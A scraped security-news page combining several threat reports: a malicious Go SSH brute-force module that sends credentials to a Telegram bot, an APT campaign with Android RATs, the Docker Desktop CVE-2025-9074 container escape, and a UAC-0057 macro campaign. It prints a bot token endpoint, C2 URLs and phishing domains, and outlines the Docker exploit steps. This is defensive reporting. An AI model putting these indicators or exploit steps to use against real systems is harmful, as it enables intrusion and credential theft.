Microsoft Threat Intelligence has spotlighted the escalating adoption of the ClickFix social engineering technique, a sophisticated method that manipulates users into executing malicious commands on their devices, bypassing traditional automated security defenses. Observed since early 2024, this tactic has targeted thousands of enterprise and end-user systems daily, delivering payloads such as Lumma Stealer infostealers, remote […]
A sophisticated supply chain attack has emerged targeting developers through a malicious Go module package that masquerades as a legitimate SSH brute forcing tool while covertly stealing credentials for cybercriminal operations.
The package, named “golang-random-ip-ssh-bruteforce,” presents itself as a fast SSH brute forcer but contains hidden functionality that exfiltrates successful login credentials to a Telegram bot controlled by threat actors.
The malicious package operates by continuously scanning random IPv4 addresses for exposed SSH services on TCP port 22, attempting authentication using an embedded username-password wordlist, and immediately transmitting any successful credentials to its operators.
What makes this attack particularly insidious is that victims believe they are conducting legitimate penetration testing or security research, while unknowingly feeding their discoveries directly to cybercriminals.
Socket.dev analysts identified the malicious behavior embedded within the seemingly legitimate security tool, revealing that the package has been active since June 24, 2022.
The researchers discovered that upon the first successful SSH login, the package automatically sends the target IP address, username, and password to a hardcoded Telegram bot endpoint controlled by a Russian-speaking threat actor known as “IllDieAnyway” on GitHub.
Telegram Bot and user info (Source – Socket.dev)
The attack vector exploits the trust relationship between developers and open-source packages, representing a growing trend of malicious actors distributing offensive security tools with backdoor functionality.
Users who download and execute the package inadvertently become unwitting participants in a larger credential harvesting operation, with their successful penetration attempts being redirected to criminal networks rather than serving their intended security assessment purposes.
Technical Implementation and Evasion Mechanisms
The malware’s technical implementation demonstrates sophisticated evasion tactics designed to maintain operational security while maximizing credential collection.
The package includes a deliberately minimal wordlist containing only common default credentials such as “root:toor,” “admin:password,” and IoT-specific combinations like “root:raspberry” and “root:dietpi,” which reduces network noise and speeds up the scanning process while maintaining plausible deniability for its operators.
The core malicious functionality centers around a hardcoded Telegram API endpoint: https://api.telegram.org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage.
When successful authentication occurs, the package executes an HTTP GET request to this endpoint, transmitting the compromised credentials in the format “ip:username:password” to chat ID 1159678884, associated with the Telegram user @io_ping.
The malware deliberately configures SSH connections with HostKeyCallback: ssh.InsecureIgnoreHostKey() to bypass server verification and enable rapid credential testing across diverse targets.
Socket’s AI scanner detected a malicious package golang-random-ip-ssh-bruteforce (Source – Socket.dev)
Here it’s the Socket AI Scanner’s detection of the embedded wordlist file (wl.txt) within the malicious package, highlighting the targeted credential combinations designed to compromise IoT devices, single-board computers, and hastily configured Linux systems.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
A sophisticated South Asian Advanced Persistent Threat (APT) group has been conducting an extensive espionage campaign targeting military personnel and defense organizations across Sri Lanka, Bangladesh, Pakistan, and Turkey.
The threat actors have deployed a multi-stage attack framework combining targeted phishing operations with novel Android malware to compromise the mobile devices of military-adjacent individuals.
The campaign demonstrates a high level of operational security and technical sophistication, utilizing legitimate cloud services and modified open-source tools to evade detection.
Top level PDF phish and Decoy shown post cred theft (Source – StrikeReady)
The attack chain begins with highly targeted phishing emails containing malicious PDF attachments disguised as official military documents.
One notable sample, titled “Coordination of the Chief of Army Staff’s Visit to China.pdf” (MD5: cf9914eca9f8ae90ddd54875506459d6), exemplifies the group’s social engineering tactics.
These documents redirect victims to credential harvesting pages hosted on compromised Netlify domains, including mail-mod-gov-bd-account-conf-files.netlify.app and coordination-cas-visit.netlify.app, which closely mimic legitimate government and military email portals.
StrikeReady analysts identified the threat actor’s infrastructure through pivoting on shared code elements and domain registration patterns.
The researchers discovered a network of over 50 malicious domains spoofing various South Asian military and government organizations, including the Bangladesh Air Force, Directorate General of Defence Purchase (DGDP), and Turkish defense contractors like Roketsans and Aselsan.
The group’s most concerning capability involves the deployment of modified Android Remote Access Trojans (RATs) based on the open-source Rafel RAT framework.
The malware, distributed through APK files such as Love_Chat.apk (MD5: 9a7510e780ef40d63ca5ab826b1e9dab), masquerades as legitimate chat applications while establishing persistent backdoor access to compromised devices.
Analysis of the decompiled application reveals extensive data exfiltration capabilities, with the malware programmed to upload various document types to command-and-control servers.
Android RAT Infrastructure
The Android component represents a significant evolution in the group’s capabilities, demonstrating sophisticated mobile malware development skills.
The threat actors modified the original Rafel RAT source code, removing attribution credits and implementing custom command-and-control communications through domains like quickhelpsolve.com and kutcat-rat.com.
Decoys (Source – StrikeReady)
The malware requests dangerous permissions including ADD_DEVICE_ADMIN, READ_EXTERNAL_STORAGE, MANAGE_APP_ALL_FILES_ACCESS_PERMISSION, and READ_CONTACTS, enabling comprehensive device compromise.
The C2 infrastructure utilizes base64-encoded communication channels, with the primary command endpoint located at https://quickhelpsolve.com/public/commands.php.
This centralized control mechanism allows operators to issue arbitrary commands to compromised devices, collect stolen data, and maintain persistent access to victim networks.
Security researchers discovered that the threat actors had successfully compromised military personnel across multiple countries, with stolen data including SMS messages, contact lists containing military ranks and duty stations, and sensitive organizational documents.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
The Zscaler ThreatLabz team has uncovered significant advancements in the Anatsa malware, also known as TeaBot, an Android banking trojan that has been active since 2020. Originally designed for credential theft, keylogging, and facilitating fraudulent transactions, Anatsa has evolved into a more sophisticated threat, now targeting over 831 financial institutions worldwide. This expansion includes new […]
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning about a critical zero-day vulnerability affecting Apple iOS, iPadOS, and macOS systems that is being actively exploited in the wild. CVE-2025-43300, an out-of-bounds write vulnerability in Apple’s Image I/O framework, poses significant security risks to millions of users across Apple’s ecosystem. Critical Vulnerability […]
A newly disclosed vulnerability in Docker Desktop for Windows has revealed how a simple Server-Side Request Forgery (SSRF) attack could lead to complete host system compromise.
CVE-2025-9074, discovered by Felix Boulet and reported on August 21, 2025, affects all Docker Desktop versions prior to 4.44.3 and demonstrates how container isolation can be completely bypassed through unauthenticated API access.
Key Takeaways 1. Docker Desktop containers can access unauthenticated API for full host compromise. 2. Two HTTP requests create privileged container with host filesystem access. 3. Update to Docker Desktop immediately.
The vulnerability was found accidentally during routine network scanning and highlights critical gaps in Docker’s internal security architecture.
Philippe Dugre from Pvotal Technologies independently discovered a similar issue on macOS platforms, emphasizing the cross-platform nature of this security flaw.
The vulnerability stems from Docker Desktop exposing its internal HTTP API endpoint at http://192.168.65.7:2375/ without any authentication mechanisms.
Any container running within the Docker environment could access this endpoint and execute privileged operations against the host system.
This represents a fundamental breakdown of the container isolation model, where workloads should be completely separated from their host environment.
The attack surface was particularly concerning because it required minimal technical sophistication—attackers needed only basic HTTP request capabilities rather than complex exploit chains or memory corruption techniques.
Docker Container Exploitation Process
The exploitation process requires just two HTTP POST requests executed from within any container environment.
The first request targets the /containers/create endpoint with a JSON payload that configures a new privileged container with host filesystem bindings.
The critical configuration parameter involves mounting the Windows C: drive (/mnt/host/c) to a container path (/host_root), effectively providing unrestricted access to the entire host filesystem.
The JSON payload also specifies execution commands that run automatically upon container startup, enabling immediate post-exploitation activities.
The second HTTP request initiates container execution through the /containers/{id}/start endpoint, triggering the malicious container with elevated privileges.
This two-step process bypasses all Docker security controls and grants attackers the same level of access as local administrator accounts.
The vulnerability is particularly insidious because it can be exploited through SSRF attacks, meaning attackers don’t require direct code execution within containers—they only need the ability to trigger HTTP requests from compromised web applications or services running in containerized environments.
Risk Factors
Details
Affected Products
Docker Desktop for Windows (versions < 4.44.3)Docker Desktop for macOS (similar issue reported)
Impact
Full host system compromise
Exploit Prerequisites
– Access to any container environment- Ability to make HTTP requests- Network connectivity to 192.168.65.7:2375
CVSS 3.1 Score
Not specified
Proof of Concept
The proof of concept demonstrates the vulnerability’s simplicity using standard wget commands executable from any Alpine Linux container.
The exploit creates a privileged container that mounts the host C: drive and executes arbitrary commands:
Docker responded quickly to this disclosure, releasing version 4.44.3 with complete remediation of the vulnerability.
The fix implements proper authentication controls for internal API endpoints and strengthens network segmentation between container workloads and Docker’s control plane.
Security researchers recommend immediate updating to the patched version, as no workarounds exist for affected systems.
Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial →
A sophisticated cyber espionage campaign has emerged targeting Ukrainian and Polish organizations through weaponized PDF invitation files designed to execute malicious shell scripts.
The campaign, active since April 2025, demonstrates a calculated approach to infiltrating government and private sector networks through carefully crafted social engineering tactics.
The threat actors behind this operation have leveraged seemingly legitimate invitation documents, including meeting invitations and official government communications, to establish initial access to target systems.
These malicious PDF files serve as decoys while simultaneously deploying multi-stage infection chains that culminate in the execution of shell scripts and the deployment of sophisticated implants for persistent access and data collection.
Infection chain for May archive (Source – HarfangLab)
The campaign exhibits notable sophistication in its execution methodology, utilizing compressed archive files containing XLS spreadsheets embedded with VBA macros.
These macros are responsible for dropping and loading Dynamic Link Libraries (DLLs) that collect comprehensive system information and retrieve next-stage malware from command and control servers.
The systematic nature of the attacks suggests a well-resourced threat actor with extensive operational capabilities.
HarfangLab researchers identified striking similarities between this campaign and previously reported activities associated with UAC-0057, also known as UNC1151, FrostyNeighbor, or Ghostwriter.
This cyber espionage group has documented ties to the Belarusian government and has consistently targeted Eastern European nations, particularly Ukraine and Poland, with sophisticated information-gathering operations designed to support state-sponsored intelligence objectives.
The malware’s impact extends beyond simple data theft, as the threat actors have demonstrated the ability to maintain persistent access to compromised systems while avoiding detection through careful operational security practices.
Infection chain for July archives (Source – HarfangLab)
The infection chains reveal a methodical approach to system reconnaissance, with implants designed to collect detailed information about compromised environments before deploying additional payloads for extended exploitation.
Infection Mechanism and Execution Flow
The UAC-0057 infection mechanism represents a carefully orchestrated multi-stage attack that begins with the delivery of malicious archive files through suspected spearphishing campaigns.
The primary infection vector involves compressed archives containing XLS spreadsheets that embed sophisticated VBA macros, which serve as the initial execution point for the malware deployment process.
Infection chain for April archives (Source – HarfangLab)
Once executed, these VBA macros demonstrate varying levels of obfuscation consistent with tools like MacroPack, an offensive security framework available on GitHub.
The execution logic has evolved throughout the campaign, with earlier samples directly dropping DLLs to temporary directories, while more recent variants employ additional layers of complexity including Microsoft Cabinet (CAB) files and Link (LNK) files to obscure the deployment process.
The infection chain progresses through a systematic approach where the VBA macro writes encrypted DLL payloads to specific system directories such as %LOCALAPPDATA%\Serv\0x00bac729fe.log or %TEMP%\DefenderProtectionScope.log.
These DLLs are subsequently loaded using Windows’ built-in regsvr32.exe utility with parameters designed to execute the malicious code while minimizing system alerts.
The first-stage implants, written in C# and obfuscated using ConfuserEx, establish persistence through Windows Registry modifications and scheduled tasks.
These implants collect comprehensive system intelligence including operating system details, hostname information, CPU specifications, and installed antivirus products before transmitting this data to command and control infrastructure designed to blend with legitimate web traffic.
Figure 1 shows the complete infection chain for the May archive variant, illustrating the sophisticated multi-layered approach employed by UAC-0057 to achieve system compromise while maintaining operational security throughout the deployment process.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Microsoft has announced significant restrictions on the use of default onmicrosoft.com domains for email communication, implementing new throttling measures to combat spam and improve email deliverability across its Microsoft 365 platform. Policy Changes Target Spam Prevention The technology giant will introduce throttling limits that restrict messages sent from onmicrosoft.com domains to just 100 external recipients […]
Cybersecurity researchers have developed an artificial intelligence system capable of automatically generating working exploits for published Common Vulnerabilities and Exposures (CVEs) in just 10-15 minutes at approximately $1 per exploit, fundamentally challenging the traditional security response timeline that defenders rely upon. The breakthrough system employs a sophisticated multi-stage pipeline that analyzes CVE advisories and code […]
Socket’s Threat Research Team has uncovered a deceptive Go module named golang-random-ip-ssh-bruteforce, which masquerades as an efficient SSH brute-forcing tool but secretly exfiltrates stolen credentials to its creator. Published on June 24, 2022, this package remains active on the Go Module ecosystem and GitHub, despite efforts to petition for its removal and the suspension of […]
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)